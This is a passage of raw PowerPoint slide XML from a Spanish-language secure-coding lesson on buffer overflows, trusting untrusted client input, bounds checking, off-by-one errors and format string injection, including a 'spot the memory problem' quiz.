            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="2500"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Si</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9300"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>BUFF_SIZE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> es mayor que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="3600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>el tamaño del buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>OVERFLOW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-UY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="791" name="Google Shape;791;p59" descr="Picture 4"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="128156" y="1541601"/>
            <a:ext cx="3189890" cy="4931230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="190028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EFADA-9348-7E49-984A-11398F0D69CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2078182" y="128665"/>
            <a:ext cx="9927343" cy="1325563"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="4000" b="1" dirty="0"/>
              <a:t>Confianza en entradas de datos no fiables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D39ABB64-6D16-2349-BCE0-32B733F95B99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2796000" y="1515126"/>
            <a:ext cx="2451158" cy="3450372"/>
            <a:chOff x="1330454" y="1615335"/>
            <a:chExt cx="2451158" cy="3450372"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="Picture 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06A9AE37-2145-9C4C-BC83-67F4276281A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810" t="61896" r="2089" b="6904"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1468301" y="1615335"/>
              <a:ext cx="718457" cy="926275"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="TextBox 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75013674-7775-EC40-9FE8-8DCFCB69DC18}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1330454" y="2488172"/>
              <a:ext cx="1173655" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>/restricted</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Graphic 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5AB5670-6DBD-6243-9168-816AC1756F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41022" y="3819788"/>
              <a:ext cx="952500" cy="952500"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="TextBox 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD484BFD-7ED3-4642-8443-E772034B8333}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1461532" y="4757930"/>
              <a:ext cx="891591" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="es-UY" dirty="0"/>
                <a:t>Atacante</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="8" name="Curved Connector 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C52721D-8D8E-444A-A815-8393BF6D18AB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="6" idx="0"/>
              <a:endCxn id="5" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000" flipH="1" flipV="1">
              <a:off x="1436135" y="3338641"/>
              <a:ext cx="962284" cy="10"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector3">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Callout 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E74D061-2B72-CF43-87C6-20F911F1E052}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2144228" y="3215593"/>
              <a:ext cx="1482058" cy="751042"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeEllipseCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -45278"/>
                <a:gd name="adj2" fmla="val 57632"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:alpha val="74000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:shade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1. Soy admin ;)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Oval Callout 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2086B177-20BA-E248-AEC2-DA3E21E8DA39}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2299554" y="1615335"/>
              <a:ext cx="1482058" cy="751042"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeEllipseCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -60069"/>
                <a:gd name="adj2" fmla="val 30113"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:alpha val="74000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:shade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 Hola admin!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A2A224C-161C-F649-B5AA-A207C5E648C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6099613" y="2096136"/>
            <a:ext cx="5247277" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" dirty="0"/>
              <a:t>La confianza en entradas de datos no fiables sucede cuando el software utiliza validaciones del lado del cliente, o almacena variables que luego son utilizadas para decisiones de seguridad.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" dirty="0"/>
              <a:t>Un atacante los puede modificar los datos almacenados en los clientes.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Google Shape;91;p2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1DEDFDF-3669-6F66-0495-149801AE30C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="186475" y="335525"/>
            <a:ext cx="15594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Y" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Ataque-Gramas</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="16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9509173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8E9-9FA4-3FA7-0CF0-FA43E8BB2623}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t>Verificar los límites</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5746A69A-98F4-E432-CC7F-84957E3CF96A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1801412"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Una comparación común y corriente contra un límite simple puede prevenir un ataque.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Prestar especial atención a los operadores de comparación como</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&lt; vs &lt;=, &lt;= puede desencadenar un ataque off </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>one</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Asegurarse de utilizar la misma constante para definir el tamaño del buffer y verificar el tamaño</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="284729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091B4-2353-F5B5-FE9C-3BCCC3463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0A542-9585-EFC0-734A-A579FC47B711}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="216038"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t>¿Inyecciones de memoria?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9F3AE6F-F29B-DE77-E6B6-2D1A49B844B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1644650"/>
            <a:ext cx="10515600" cy="4410075"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="50800" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Las Inyección de Formato de String es un tipo de falla de memoria provocado por utilizar una entrada de datos como un parámetro de formatos.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="804" name="Google Shape;804;p61" descr="Picture 6"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1515650" y="2057400"/>
            <a:ext cx="9036486" cy="4518243"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="94511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4E6330D-87DE-F186-C346-CFC519DA01E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4645C64-A177-4BE8-0005-EB543F83C1B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="387927" y="2964874"/>
            <a:ext cx="8732322" cy="3560618"/>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rtl="0">
              <a:lnSpc>
                <a:spcPct val="81000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="4685"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" sz="6600" b="1" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Juguemos a:</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="4400" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="81000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFF00"/>
              </a:buClr>
              <a:buSzPts val="5112"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" sz="7200" b="1" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>¡DETECTAR EL PROBLEMA DE MEMORIA!</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="4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3103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6F10F-6427-86AB-B303-31333F10B977}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-UY"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFB0A645-48B5-61EF-12B9-15C61A389673}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1801412"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-UY"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="814" name="Google Shape;814;p63" descr="Picture 5"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="457245"/>
            <a:ext cx="12192000" cy="5912446"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="815" name="Google Shape;815;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2256246"/>
            <a:ext cx="12192000" cy="325926"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00">
              <a:alpha val="16862"/>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6" name="Google Shape;816;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4514908"/>
            <a:ext cx="12192000" cy="325926"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00">
              <a:alpha val="16862"/>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7" name="Google Shape;817;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1525562"/>
            <a:ext cx="12192000" cy="325926"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00">
              <a:alpha val="16862"/>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8" name="Google Shape;818;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5245594"/>
            <a:ext cx="12192000" cy="325926"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00">
              <a:alpha val="16862"/>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0196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894B5-F526-B655-0BEE-C0CD44F2EB4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74C03C1-A23D-72D1-35CB-38E06B1623CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1760964"/>
            <a:ext cx="10515600" cy="3336071"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="8800" dirty="0"/>
              <a:t>Respuesta: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="8800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" sz="8800" dirty="0"/>
              <a:t>bottom.cpp</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="8800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" sz="6600" dirty="0"/>
              <a:t>(uso de funciones peligrosas)</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="8800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35953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36407-C76C-186C-E3E3-C4304087DA6E}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="828" name="Google Shape;828;p65" descr="Picture 8"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="36853"/>
            <a:ext cx="12192001" cy="6457571"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="829" name="Google Shape;829;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1047947"/>
            <a:ext cx="12192001" cy="325926"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00">
              <a:alpha val="15686"/>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0" name="Google Shape;830;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4995553"/>
            <a:ext cx="12192001" cy="325926"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00">
              <a:alpha val="15686"/>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1" name="Google Shape;831;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2113263"/>
            <a:ext cx="12192001" cy="325926"/>
